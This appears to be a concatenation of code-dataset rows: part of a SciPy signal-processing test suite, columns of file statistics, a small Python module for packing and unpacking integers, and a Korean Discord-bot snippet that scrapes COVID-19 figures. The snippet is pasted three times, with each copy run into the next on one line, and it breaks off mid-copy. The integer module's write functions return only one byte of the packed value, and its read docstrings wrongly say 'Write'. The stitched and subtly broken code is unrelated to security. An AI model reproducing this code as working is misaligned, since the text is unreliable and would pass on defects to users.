f, p = csd(x, x, nperseg=16, noverlap=4)
q = np.array([0, 1./12., 1./3., 1./5., 1./3., 1./5., 1./3., 1./5.,
1./6.])
assert_allclose(p, q, atol=1e-12)
def test_bad_noverlap(self):
assert_raises(ValueError, csd, np.zeros(4), np.ones(4), 1, 'hann',
2, 7)
def test_nfft_too_short(self):
assert_raises(ValueError, csd, np.ones(12), np.zeros(12), nfft=3,
nperseg=4)
def test_real_onesided_even_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
def test_real_onesided_odd_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.12477458, 0.23430935, 0.17072113, 0.17072116,
0.17072113], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
def test_real_twosided_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8, return_onesided=False)
assert_allclose(f, fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.11111111,
0.07638889], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
def test_complex_32(self):
x = np.zeros(16, 'F')
x[0] = 1.0 + 2.0j
x[8] = 1.0 + 2.0j
f, p = csd(x, x, nperseg=8, return_onesided=False)
assert_allclose(f, fftfreq(8, 1.0))
q = np.array([0.41666666, 0.38194442, 0.55555552, 0.55555552,
0.55555558, 0.55555552, 0.55555552, 0.38194442], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype,
'dtype mismatch, %s, %s' % (p.dtype, q.dtype))
def test_padded_freqs(self):
x = np.zeros(12)
y = np.ones(12)
nfft = 24
f = fftfreq(nfft, 1.0)[:nfft//2+1]
f[-1] *= -1
fodd, _ = csd(x, y, nperseg=5, nfft=nfft)
feven, _ = csd(x, y, nperseg=6, nfft=nfft)
assert_allclose(f, fodd)
assert_allclose(f, feven)
nfft = 25
f = fftfreq(nfft, 1.0)[:(nfft + 1)//2]
fodd, _ = csd(x, y, nperseg=5, nfft=nfft)
feven, _ = csd(x, y, nperseg=6, nfft=nfft)
assert_allclose(f, fodd)
assert_allclose(f, feven)
class TestCoherence(object):
def test_identical_input(self):
x = np.random.randn(20)
y = np.copy(x) # So `y is x` -> False
f = np.linspace(0, 0.5, 6)
C = np.ones(6)
f1, C1 = coherence(x, y, nperseg=10)
assert_allclose(f, f1)
assert_allclose(C, C1)
def test_phase_shifted_input(self):
x = np.random.randn(20)
y = -x
f = np.linspace(0, 0.5, 6)
C = np.ones(6)
f1, C1 = coherence(x, y, nperseg=10)
assert_allclose(f, f1)
assert_allclose(C, C1)
class TestSpectrogram(object):
def test_average_all_segments(self):
x = np.random.randn(1024)
fs = 1.0
window = ('tukey', 0.25)
nperseg = 16
noverlap = 2
f, _, P = spectrogram(x, fs, window, nperseg, noverlap)
fw, Pw = welch(x, fs, window, nperseg, noverlap)
assert_allclose(f, fw)
assert_allclose(np.mean(P, axis=-1), Pw)
def test_window_external(self):
x = np.random.randn(1024)
fs = 1.0
window = ('tukey', 0.25)
nperseg = 16
noverlap = 2
f, _, P = spectrogram(x, fs, window, nperseg, noverlap)
win = signal.get_window(('tukey', 0.25), 16)
fe, _, Pe = spectrogram(x, fs, win, nperseg=None, noverlap=2)
assert_array_equal(fe.shape, (9,)) # because win length used as nperseg
assert_array_equal(Pe.shape, (9,73))
assert_raises(ValueError, spectrogram, x,
fs, win, nperseg=8) # because nperseg != win.shape[-1]
win_err = signal.get_window(('tukey', 0.25), 2048)
assert_raises(ValueError, spectrogram, x,
fs, win_err, nperseg=None) # win longer than signal
def test_short_data(self):
x = np.random.randn(1024)
fs = 1.0
#for string-like window, input signal length < nperseg value gives
#UserWarning, sets nperseg to x.shape[-1]
f, _, p = spectrogram(x, fs, window=('tukey',0.25)) # default nperseg
with suppress_warnings() as sup:
sup.filter(UserWarning,
"nperseg = 1025 is greater than input length = 1024, using nperseg = 1024")
f1, _, p1 = spectrogram(x, fs, window=('tukey',0.25),
nperseg=1025) # user-specified nperseg
f2, _, p2 = spectrogram(x, fs, nperseg=256) # to compare w/default
f3, _, p3 = spectrogram(x, fs, nperseg=1024) # compare w/user-spec'd
assert_allclose(f, f2)
assert_allclose(p, p2)
assert_allclose(f1, f3)
assert_allclose(p1, p3)
class TestLombscargle(object):
def test_frequency(self):
"""Test if frequency location of peak corresponds to frequency of
generated input signal.
"""
# Input parameters
ampl = 2.
w = 1.
phi = 0.5 * np.pi
nin = 100
nout = 1000
p = 0.7 # Fraction of points to select
# Randomly select a fraction of an array with timesteps
np.random.seed(2353425)
r = np.random.rand(nin)
t = np.linspace(0.01*np.pi, 10.*np.pi, nin)[r >= p]
# Plot a sine wave for the selected times
x = ampl * np.sin(w*t + phi)
# Define the array of frequencies for which to compute the periodogram
f = np.linspace(0.01, 10., nout)
# Calculate Lomb-Scargle periodogram
P = lombscargle(t, x, f)
# Check if difference between found frequency maximum and input
# frequency is less than accuracy
delta = f[1] - f[0]
assert_(w - f[np.argmax(P)] < (delta/2.))
def test_amplitude(self):
# Test if height of peak in normalized Lomb-Scargle periodogram
# corresponds to amplitude of the generated input signal.
# Input parameters
ampl = 2.
w = 1.
phi = 0.5 * np.pi
nin = 100
nout = 1000
p = 0.7 # Fraction of points to select
# Randomly select a fraction of an array with timesteps
np.random.seed(2353425)
r = np.random.rand(nin)
t = np.linspace(0.01*np.pi, 10.*np.pi, nin)[r >= p]
# Plot a sine wave for the selected times
x = ampl * np.sin(w*t + phi)
# Define the array of frequencies for which to compute the periodogram
f = np.linspace(0.01, 10., nout)
# Calculate Lomb-Scargle periodogram
pgram = lombscargle(t, x, f)
# Normalize
pgram = np.sqrt(4 * pgram / t.shape[0])
# Check if difference between found frequency maximum and input
# frequency is less than accuracy
assert_approx_equal(np.max(pgram), ampl, significant=2)
def test_precenter(self):
# Test if precenter gives the same result as manually precentering.
# Input parameters
ampl = 2.
w = 1.
phi = 0.5 * np.pi
nin = 100
nout = 1000
p = 0.7 # Fraction of points to select
offset = 0.15 # Offset to be subtracted in pre-centering
# Randomly select a fraction of an array with timesteps
np.random.seed(2353425)
r = np.random.rand(nin)
t = np.linspace(0.01*np.pi, 10.*np.pi, nin)[r >= p]
# Plot a sine wave for the selected times
x = ampl * np.sin(w*t + phi) + offset
# Define the array of frequencies for which to compute the periodogram
f = np.linspace(0.01, 10., nout)
# Calculate Lomb-Scargle periodogram
pgram = lombscargle(t, x, f, precenter=True)
pgram2 = lombscargle(t, x - x.mean(), f, precenter=False)
# check if centering worked
assert_allclose(pgram, pgram2)
def test_normalize(self):
# Test normalize option of Lomb-Scarge.
# Input parameters
ampl = 2.
w = 1.
phi = 0.5 * np.pi
nin = 100
nout = 1000
p = 0.7 # Fraction of points to select
# Randomly select a fraction of an array with timesteps
np.random.seed(2353425)
r = np.random.rand(nin)
t = np.linspace(0.01*np.pi, 10.*np.pi, nin)[r >= p]
# Plot a sine wave for the selected times
x = ampl * np.sin(w*t + phi)
# Define the array of frequencies for which to compute the periodogram
f = np.linspace(0.01, 10., nout)
# Calculate Lomb-Scargle periodogram
pgram = lombscargle(t, x, f)
pgram2 = lombscargle(t, x, f, normalize=True)
# check if normalization works as expected
assert_allclose(pgram * 2 / np.dot(x, x), pgram2)
assert_approx_equal(np.max(pgram2), 1.0, significant=2)
def test_wrong_shape(self):
t = np.linspace(0, 1, 1)
x = np.linspace(0, 1, 2)
f = np.linspace(0, 1, 3)
assert_raises(ValueError, lombscargle, t, x, f)
def test_zero_division(self):
t = np.zeros(1)
x = np.zeros(1)
f = np.zeros(1)
assert_raises(ZeroDivisionError, lombscargle, t, x, f)
def test_lombscargle_atan_vs_atan2(self):
# https://github.com/scipy/scipy/issues/3787
# This raised a ZeroDivisionError.
t = np.linspace(0, 10, 1000, endpoint=False)
x = np.sin(4*t)
f = np.linspace(0, 50, 500, endpoint=False) + 0.1
lombscargle(t, x, f*2*np.pi)
class TestSTFT(object):
def test_input_validation(self):
assert_raises(ValueError, check_COLA, 'hann', -10, 0)
assert_raises(ValueError, check_COLA, 'hann', 10, 20)
assert_raises(ValueError, check_COLA, np.ones((2,2)), 10, 0)
assert_raises(ValueError, check_COLA, np.ones(20), 10, 0)
assert_raises(ValueError, check_NOLA, 'hann', -10, 0)
assert_raises(ValueError, check_NOLA, 'hann', 10, 20)
assert_raises(ValueError, check_NOLA, np.ones((2,2)), 10, 0)
assert_raises(ValueError, check_NOLA, np.ones(20), 10, 0)
assert_raises(ValueError, check_NOLA, 'hann', 64, -32)
x = np.zeros(1024)
z = np.array(stft(x), dtype=object)
assert_raises(ValueError, stft, x, window=np.ones((2,2)))
assert_raises(ValueError, stft, x, window=np.ones(10), nperseg=256)
assert_raises(ValueError, stft, x, nperseg=-256)
assert_raises(ValueError, stft, x, nperseg=256, noverlap=1024)
assert_raises(ValueError, stft, x, nperseg=256, nfft=8)
assert_raises(ValueError, istft, x) # Not 2d
assert_raises(ValueError, istft, z, window=np.ones((2,2)))
assert_raises(ValueError, istft, z, window=np.ones(10), nperseg=256)
assert_raises(ValueError, istft, z, nperseg=-256)
assert_raises(ValueError, istft, z, nperseg=256, noverlap=1024)
assert_raises(ValueError, istft, z, nperseg=256, nfft=8)
assert_raises(ValueError, istft, z, nperseg=256, noverlap=0,
window='hann') # Doesn't meet COLA
assert_raises(ValueError, istft, z, time_axis=0, freq_axis=0)
assert_raises(ValueError, _spectral_helper, x, x, mode='foo')
assert_raises(ValueError, _spectral_helper, x[:512], x[512:],
mode='stft')
assert_raises(ValueError, _spectral_helper, x, x, boundary='foo')
def test_check_COLA(self):
settings = [
('boxcar', 10, 0),
('boxcar', 10, 9),
('bartlett', 51, 26),
('hann', 256, 128),
('hann', 256, 192),
('blackman', 300, 200),
(('tukey', 0.5), 256, 64),
('hann', 256, 255),
]
for setting in settings:
msg = '{0}, {1}, {2}'.format(*setting)
assert_equal(True, check_COLA(*setting), err_msg=msg)
def test_check_NOLA(self):
settings_pass = [
('boxcar', 10, 0),
('boxcar', 10, 9),
('boxcar', 10, 7),
('bartlett', 51, 26),
('bartlett', 51, 10),
('hann', 256, 128),
('hann', 256, 192),
('hann', 256, 37),
('blackman', 300, 200),
('blackman', 300, 123),
(('tukey', 0.5), 256, 64),
(('tukey', 0.5), 256, 38),
('hann', 256, 255),
('hann', 256, 39),
]
for setting in settings_pass:
msg = '{0}, {1}, {2}'.format(*setting)
assert_equal(True, check_NOLA(*setting), err_msg=msg)
w_fail = np.ones(16)
w_fail[::2] = 0
settings_fail = [
(w_fail, len(w_fail), len(w_fail) // 2),
('hann', 64, 0),
]
for setting in settings_fail:
msg = '{0}, {1}, {2}'.format(*setting)
assert_equal(False, check_NOLA(*setting), err_msg=msg)
def test_average_all_segments(self):
np.random.seed(1234)
x = np.random.randn(1024)
fs = 1.0
window = 'hann'
nperseg = 16
noverlap = 8
# Compare twosided, because onesided welch doubles non-DC terms to
# account for power at negative frequencies. stft doesn't do this,
# because it breaks invertibility.
f, _, Z = stft(x, fs, window, nperseg, noverlap, padded=False,
return_onesided=False, boundary=None)
fw, Pw = welch(x, fs, window, nperseg, noverlap, return_onesided=False,
scaling='spectrum', detrend=False)
assert_allclose(f, fw)
assert_allclose(np.mean(np.abs(Z)**2, axis=-1), Pw)
def test_permute_axes(self):
np.random.seed(1234)
x = np.random.randn(1024)
fs = 1.0
window = 'hann'
nperseg = 16
noverlap = 8
f1, t1, Z1 = stft(x, fs, window, nperseg, noverlap)
f2, t2, Z2 = stft(x.reshape((-1, 1, 1)), fs, window, nperseg, noverlap,
axis=0)
t3, x1 = istft(Z1, fs, window, nperseg, noverlap)
t4, x2 = istft(Z2.T, fs, window, nperseg, noverlap, time_axis=0,
freq_axis=-1)
assert_allclose(f1, f2)
assert_allclose(t1, t2)
assert_allclose(t3, t4)
assert_allclose(Z1, Z2[:, 0, 0, :])
assert_allclose(x1, x2[:, 0, 0])
def test_roundtrip_real(self):
np.random.seed(1234)
settings = [
('boxcar', 100, 10, 0), # Test no overlap
('boxcar', 100, 10, 9), # Test high overlap
('bartlett', 101, 51, 26), # Test odd nperseg
('hann', 1024, 256, 128), # Test defaults
(('tukey', 0.5), 1152, 256, 64), # Test Tukey
('hann', 1024, 256, 255), # Test overlapped hann
]
for window, N, nperseg, noverlap in settings:
t = np.arange(N)
x = 10*np.random.randn(t.size)
_, _, zz = stft(x, nperseg=nperseg, noverlap=noverlap,
window=window, detrend=None, padded=False)
tr, xr = istft(zz, nperseg=nperseg, noverlap=noverlap,
window=window)
msg = '{0}, {1}'.format(window, noverlap)
assert_allclose(t, tr, err_msg=msg)
assert_allclose(x, xr, err_msg=msg)
def test_roundtrip_not_nola(self):
np.random.seed(1234)
w_fail = np.ones(16)
w_fail[::2] = 0
settings = [
(w_fail, 256, len(w_fail), len(w_fail) // 2),
('hann', 256, 64, 0),
]
for window, N, nperseg, noverlap in settings:
msg = '{0}, {1}, {2}, {3}'.format(window, N, nperseg, noverlap)
assert not check_NOLA(window, nperseg, noverlap), msg
t = np.arange(N)
x = 10 * np.random.randn(t.size)
_, _, zz = stft(x, nperseg=nperseg, noverlap=noverlap,
window=window, detrend=None, padded=True,
boundary='zeros')
with pytest.warns(UserWarning, match='NOLA'):
tr, xr = istft(zz, nperseg=nperseg, noverlap=noverlap,
window=window, boundary=True)
assert np.allclose(t, tr[:len(t)]), msg
assert not np.allclose(x, xr[:len(x)]), msg
def test_roundtrip_nola_not_cola(self):
np.random.seed(1234)
settings = [
('boxcar', 100, 10, 3), # NOLA True, COLA False
('bartlett', 101, 51, 37), # NOLA True, COLA False
('hann', 1024, 256, 127), # NOLA True, COLA False
(('tukey', 0.5), 1152, 256, 14), # NOLA True, COLA False
('hann', 1024, 256, 5), # NOLA True, COLA False
]
for window, N, nperseg, noverlap in settings:
msg = '{0}, {1}, {2}'.format(window, nperseg, noverlap)
assert check_NOLA(window, nperseg, noverlap), msg
assert not check_COLA(window, nperseg, noverlap), msg
t = np.arange(N)
x = 10 * np.random.randn(t.size)
_, _, zz = stft(x, nperseg=nperseg, noverlap=noverlap,
window=window, detrend=None, padded=True,
boundary='zeros')
tr, xr = istft(zz, nperseg=nperseg, noverlap=noverlap,
window=window, boundary=True)
msg = '{0}, {1}'.format(window, noverlap)
assert_allclose(t, tr[:len(t)], err_msg=msg)
assert_allclose(x, xr[:len(x)], err_msg=msg)
def test_roundtrip_float32(self):
np.random.seed(1234)
settings = [('hann', 1024, 256, 128)]
for window, N, nperseg, noverlap in settings:
t = np.arange(N)
x = 10*np.random.randn(t.size)
x = x.astype(np.float32)
_, _, zz = stft(x, nperseg=nperseg, noverlap=noverlap,
window=window, detrend=None, padded=False)
tr, xr = istft(zz, nperseg=nperseg, noverlap=noverlap,
window=window)
msg = '{0}, {1}'.format(window, noverlap)
assert_allclose(t, t, err_msg=msg)
assert_allclose(x, xr, err_msg=msg, rtol=1e-4, atol=1e-5)
assert_(x.dtype == xr.dtype)
def test_roundtrip_complex(self):
np.random.seed(1234)
settings = [
('boxcar', 100, 10, 0), # Test no overlap
('boxcar', 100, 10, 9), # Test high overlap
('bartlett', 101, 51, 26), # Test odd nperseg
('hann', 1024, 256, 128), # Test defaults
(('tukey', 0.5), 1152, 256, 64), # Test Tukey
('hann', 1024, 256, 255), # Test overlapped hann
]
for window, N, nperseg, noverlap in settings:
t = np.arange(N)
x = 10*np.random.randn(t.size) + 10j*np.random.randn(t.size)
_, _, zz = stft(x, nperseg=nperseg, noverlap=noverlap,
window=window, detrend=None, padded=False,
return_onesided=False)
tr, xr = istft(zz, nperseg=nperseg, noverlap=noverlap,
window=window, input_onesided=False)
msg = '{0}, {1}, {2}'.format(window, nperseg, noverlap)
assert_allclose(t, tr, err_msg=msg)
assert_allclose(x, xr, err_msg=msg)
# Check that asking for onesided switches to twosided
with suppress_warnings() as sup:
sup.filter(UserWarning,
"Input data is complex, switching to return_onesided=False")
_, _, zz = stft(x, nperseg=nperseg, noverlap=noverlap,
window=window, detrend=None, padded=False,
return_onesided=True)
tr, xr = istft(zz, nperseg=nperseg, noverlap=noverlap,
window=window, input_onesided=False)
msg = '{0}, {1}, {2}'.format(window, nperseg, noverlap)
assert_allclose(t, tr, err_msg=msg)
assert_allclose(x, xr, err_msg=msg)
def test_roundtrip_boundary_extension(self):
np.random.seed(1234)
# Test against boxcar, since window is all ones, and thus can be fully
# recovered with no boundary extension
settings = [
('boxcar', 100, 10, 0), # Test no overlap
('boxcar', 100, 10, 9), # Test high overlap
]
for window, N, nperseg, noverlap in settings:
t = np.arange(N)
x = 10*np.random.randn(t.size)
_, _, zz = stft(x, nperseg=nperseg, noverlap=noverlap,
window=window, detrend=None, padded=True,
boundary=None)
_, xr = istft(zz, noverlap=noverlap, window=window, boundary=False)
for boundary in ['even', 'odd', 'constant', 'zeros']:
_, _, zz_ext = stft(x, nperseg=nperseg, noverlap=noverlap,
window=window, detrend=None, padded=True,
boundary=boundary)
_, xr_ext = istft(zz_ext, noverlap=noverlap, window=window,
boundary=True)
msg = '{0}, {1}, {2}'.format(window, noverlap, boundary)
assert_allclose(x, xr, err_msg=msg)
assert_allclose(x, xr_ext, err_msg=msg)
def test_roundtrip_padded_signal(self):
np.random.seed(1234)
settings = [
('boxcar', 101, 10, 0),
('hann', 1000, 256, 128),
]
for window, N, nperseg, noverlap in settings:
t = np.arange(N)
x = 10*np.random.randn(t.size)
_, _, zz = stft(x, nperseg=nperseg, noverlap=noverlap,
window=window, detrend=None, padded=True)
tr, xr = istft(zz, noverlap=noverlap, window=window)
msg = '{0}, {1}'.format(window, noverlap)
# Account for possible zero-padding at the end
assert_allclose(t, tr[:t.size], err_msg=msg)
assert_allclose(x, xr[:x.size], err_msg=msg)
def test_roundtrip_padded_FFT(self):
np.random.seed(1234)
settings = [
('hann', 1024, 256, 128, 512),
('hann', 1024, 256, 128, 501),
('boxcar', 100, 10, 0, 33),
(('tukey', 0.5), 1152, 256, 64, 1024),
]
for window, N, nperseg, noverlap, nfft in settings:
t = np.arange(N)
x = 10*np.random.randn(t.size)
xc = x*np.exp(1j*np.pi/4)
# real signal
_, _, z = stft(x, nperseg=nperseg, noverlap=noverlap, nfft=nfft,
window=window, detrend=None, padded=True)
# complex signal
_, _, zc = stft(xc, nperseg=nperseg, noverlap=noverlap, nfft=nfft,
window=window, detrend=None, padded=True,
return_onesided=False)
tr, xr = istft(z, nperseg=nperseg, noverlap=noverlap, nfft=nfft,
window=window)
tr, xcr = istft(zc, nperseg=nperseg, noverlap=noverlap, nfft=nfft,
window=window, input_onesided=False)
msg = '{0}, {1}'.format(window, noverlap)
assert_allclose(t, tr, err_msg=msg)
assert_allclose(x, xr, err_msg=msg)
assert_allclose(xc, xcr, err_msg=msg)
def test_axis_rolling(self):
np.random.seed(1234)
x_flat = np.random.randn(1024)
_, _, z_flat = stft(x_flat)
for a in range(3):
newshape = [1,]*3
newshape[a] = -1
x = x_flat.reshape(newshape)
_, _, z_plus = stft(x, axis=a) # Positive axis index
_, _, z_minus = stft(x, axis=a-x.ndim) # Negative axis index
assert_equal(z_flat, z_plus.squeeze(), err_msg=a)
assert_equal(z_flat, z_minus.squeeze(), err_msg=a-x.ndim)
# z_flat has shape [n_freq, n_time]
# Test vs. transpose
_, x_transpose_m = istft(z_flat.T, time_axis=-2, freq_axis=-1)
_, x_transpose_p = istft(z_flat.T, time_axis=0, freq_axis=1)
assert_allclose(x_flat, x_transpose_m, err_msg='istft transpose minus')
assert_allclose(x_flat, x_transpose_p, err_msg='istft transpose plus')
| 36.448087
| 105
| 0.535982
| 7,587
| 53,360
| 3.654804
| 0.060498
| 0.082297
| 0.018176
| 0.022936
| 0.841934
| 0.818601
| 0.791518
| 0.754914
| 0.721699
| 0.694327
| 0
| 0.104996
| 0.323707
| 53,360
| 1,463
| 106
| 36.473001
| 0.663397
| 0.066417
| 0
| 0.707904
| 0
| 0
| 0.021896
| 0.000423
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.094502
| false
| 0.001718
| 0.007732
| 0
| 0.108247
| 0.000859
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b9a468bb8b5472d274f4b8ce624d28bfddfccd63
| 1,557
|
py
|
Python
|
binary/integer.py
|
deadlock-delegate/binary
|
a643787be0070c35273057c4a176fe0f1588f1c5
|
[
"MIT"
] | null | null | null |
binary/integer.py
|
deadlock-delegate/binary
|
a643787be0070c35273057c4a176fe0f1588f1c5
|
[
"MIT"
] | 2
|
2019-01-28T10:22:14.000Z
|
2019-01-28T10:40:45.000Z
|
binary/integer.py
|
deadlock-delegate/binary
|
a643787be0070c35273057c4a176fe0f1588f1c5
|
[
"MIT"
] | 2
|
2018-06-27T16:51:33.000Z
|
2019-01-28T10:13:53.000Z
|
from struct import pack, unpack_from
def read_bit8(data, offset=0):
"""Write a signed 8 bit integer
Args:
data (bytes)
Returns:
int
"""
return unpack_from('b', data, offset)[0]
def read_bit16(data, offset=0):
"""Write a signed 16 bit integer
Args:
data (bytes)
Returns:
int
"""
return unpack_from('h', data, offset)[0]
def read_bit32(data, offset=0):
"""Write a signed 32 bit integer
Args:
data (bytes)
Returns:
int
"""
return unpack_from('l', data, offset)[0]
def read_bit64(data, offset=0):
"""Write a signed 64 bit integer
Args:
data (bytes)
Returns:
int
"""
return unpack_from('q', data, offset)[0]
def write_bit8(data):
"""Write a signed 8 bit integer
Args:
data (int)
Returns:
bytes: bytes object containing value from data
"""
return pack('b', data)[1]
def write_bit16(data):
"""Write a signed 16 bit integer
Args:
data (int)
Returns:
bytes: bytes object containing value from data
"""
return pack('h', data)[1]
def write_bit32(data):
"""Write a signed 32 bit integer
Args:
data (int)
Returns:
bytes: bytes object containing value from data
"""
return pack('l', data)[1]
def write_bit64(data):
"""Write a signed 64 bit integer
Args:
data (int)
Returns:
bytes: bytes object containing value from data
"""
return pack('q', data)[1]
| 15.887755
| 54
| 0.569685
| 206
| 1,557
| 4.242718
| 0.174757
| 0.091533
| 0.100687
| 0.16476
| 0.814645
| 0.75286
| 0.702517
| 0.702517
| 0.576659
| 0.576659
| 0
| 0.037594
| 0.316635
| 1,557
| 97
| 55
| 16.051546
| 0.783835
| 0.473346
| 0
| 0
| 0
| 0
| 0.013093
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.470588
| false
| 0
| 0.058824
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
6a01cfafc9d5a5b2262f178a1438c1c0c9c51edc
| 6,604
|
py
|
Python
|
coivd19.py
|
ksy53576/machim_client_src
|
813b711d032ab35f76efd91f5ceb4a471d73c10a
|
[
"MIT"
] | 1
|
2021-06-07T05:43:18.000Z
|
2021-06-07T05:43:18.000Z
|
coivd19.py
|
ksy53576/machim_client_src
|
813b711d032ab35f76efd91f5ceb4a471d73c10a
|
[
"MIT"
] | null | null | null |
coivd19.py
|
ksy53576/machim_client_src
|
813b711d032ab35f76efd91f5ceb4a471d73c10a
|
[
"MIT"
] | 1
|
2021-06-12T08:47:49.000Z
|
2021-06-12T08:47:49.000Z
|
if message.content.startswith('.코로나'): # '.코로나' 라는 메시지가 감지되었을 시
url = 'http://ncov.mohw.go.kr/bdBoardList_Real.do?brdId=1&brdGubun=11&ncvContSeq=&contSeq=&board_id=&gubun='
html = urllib.request.urlopen(url)
soup = BeautifulSoup(html, "html.parser")
datecr = soup.find('span', {'class': 't_date'}) #기준날짜
#print(f'기준일: {datecr.string}')
totalcovid = soup.select('dd.ca_value')[0].text #누적 확진자수
#print(f'누적 확진자: {totalcovid} 명')
todaytotalcovid = soup.select('p.inner_value')[0].text #당일 확진자수 소계
#print(f'확진자 소계: {todaytotalcovid} 명')
todaydomecovid = soup.select('p.inner_value')[1].text #당일 국내발생 확진자수
#print(f'국내발생: {todaydomecovid} 명')
todayforecovid = soup.select('p.inner_value')[2].text #당일 해외유입 확진자수
#print(f'해외유입: {todayforecovid} 명')
totalca = soup.select('dd.ca_value')[2].text #누적 격리해제
#print(f'누적 격리해제: {totalca} 명')
todayca = soup.select('span.txt_ntc')[0].text #당일 격리해제
#print(f'격리해제: {todayca} 명')
totalcaing = soup.select('dd.ca_value')[4].text #누적 격리중
#print(f'누적 격리중: {totalcaing}')
todaycaing = soup.select('span.txt_ntc')[1].text #당일 격리중
#print(f'격리중: {todaycaing} 명')
totaldead = soup.select('dd.ca_value')[6].text #누적 사망자
#print(f'누적 사망자: {totaldead} 명')
todaydead = soup.select('span.txt_ntc')[2].text #당일 사망자
#print(f'사망자: {todaydead} 명')
covidembed = discord.Embed(title='코로나19 국내 발생현황', description="", color=0xFF0F13, url='http://ncov.mohw.go.kr/')
covidembed.add_field(name='🦠 확진환자', value=f'{totalcovid}({todaytotalcovid}) 명'
f'\n\n국내발생: {todaydomecovid} 명\n해외유입: {todayforecovid} 명', inline=False)
covidembed.add_field(name='😷 격리중', value=f'{totalcaing}({todaycaing}) 명', inline=False)
covidembed.add_field(name='🆓 격리해제', value=f'{totalca}({todayca}) 명', inline=False)
covidembed.add_field(name='💀 사망자', value=f'{totaldead}({todaydead}) 명', inline=False)
covidembed.set_footer(text=datecr.string)
await message.channel.send(embed=covidembed) if message.content.startswith('.코로나'): # '.코로나' 라는 메시지가 감지되었을 시
url = 'http://ncov.mohw.go.kr/bdBoardList_Real.do?brdId=1&brdGubun=11&ncvContSeq=&contSeq=&board_id=&gubun='
html = urllib.request.urlopen(url)
soup = BeautifulSoup(html, "html.parser")
datecr = soup.find('span', {'class': 't_date'}) #기준날짜
#print(f'기준일: {datecr.string}')
totalcovid = soup.select('dd.ca_value')[0].text #누적 확진자수
#print(f'누적 확진자: {totalcovid} 명')
todaytotalcovid = soup.select('p.inner_value')[0].text #당일 확진자수 소계
#print(f'확진자 소계: {todaytotalcovid} 명')
todaydomecovid = soup.select('p.inner_value')[1].text #당일 국내발생 확진자수
#print(f'국내발생: {todaydomecovid} 명')
todayforecovid = soup.select('p.inner_value')[2].text #당일 해외유입 확진자수
#print(f'해외유입: {todayforecovid} 명')
totalca = soup.select('dd.ca_value')[2].text #누적 격리해제
#print(f'누적 격리해제: {totalca} 명')
todayca = soup.select('span.txt_ntc')[0].text #당일 격리해제
#print(f'격리해제: {todayca} 명')
totalcaing = soup.select('dd.ca_value')[4].text #누적 격리중
#print(f'누적 격리중: {totalcaing}')
todaycaing = soup.select('span.txt_ntc')[1].text #당일 격리중
#print(f'격리중: {todaycaing} 명')
totaldead = soup.select('dd.ca_value')[6].text #누적 사망자
#print(f'누적 사망자: {totaldead} 명')
todaydead = soup.select('span.txt_ntc')[2].text #당일 사망자
#print(f'사망자: {todaydead} 명')
covidembed = discord.Embed(title='코로나19 국내 발생현황', description="", color=0xFF0F13, url='http://ncov.mohw.go.kr/')
covidembed.add_field(name='🦠 확진환자', value=f'{totalcovid}({todaytotalcovid}) 명'
f'\n\n국내발생: {todaydomecovid} 명\n해외유입: {todayforecovid} 명', inline=False)
covidembed.add_field(name='😷 격리중', value=f'{totalcaing}({todaycaing}) 명', inline=False)
covidembed.add_field(name='🆓 격리해제', value=f'{totalca}({todayca}) 명', inline=False)
covidembed.add_field(name='💀 사망자', value=f'{totaldead}({todaydead}) 명', inline=False)
covidembed.set_footer(text=datecr.string)
await message.channel.send(embed=covidembed) if message.content.startswith('.코로나'): # '.코로나' 라는 메시지가 감지되었을 시
url = 'http://ncov.mohw.go.kr/bdBoardList_Real.do?brdId=1&brdGubun=11&ncvContSeq=&contSeq=&board_id=&gubun='
html = urllib.request.urlopen(url)
soup = BeautifulSoup(html, "html.parser")
datecr = soup.find('span', {'class': 't_date'}) #기준날짜
#print(f'기준일: {datecr.string}')
totalcovid = soup.select('dd.ca_value')[0].text #누적 확진자수
#print(f'누적 확진자: {totalcovid} 명')
todaytotalcovid = soup.select('p.inner_value')[0].text #당일 확진자수 소계
#print(f'확진자 소계: {todaytotalcovid} 명')
todaydomecovid = soup.select('p.inner_value')[1].text #당일 국내발생 확진자수
#print(f'국내발생: {todaydomecovid} 명')
todayforecovid = soup.select('p.inner_value')[2].text #당일 해외유입 확진자수
#print(f'해외유입: {todayforecovid} 명')
totalca = soup.select('dd.ca_value')[2].text #누적 격리해제
#print(f'누적 격리해제: {totalca} 명')
todayca = soup.select('span.txt_ntc')[0].text #당일 격리해제
#print(f'격리해제: {todayca} 명')
totalcaing = soup.select('dd.ca_value')[4].text #누적 격리중
#print(f'누적 격리중: {totalcaing}')
todaycaing = soup.select('span.txt_ntc')[1].text #당일 격리중
#print(f'격리중: {todaycaing} 명')
totaldead = soup.select('dd.ca_value')[6].text #누적 사망자
#print(f'누적 사망자: {totaldead} 명')
todaydead = soup.select('span.txt_ntc')[2].text #당일 사망자
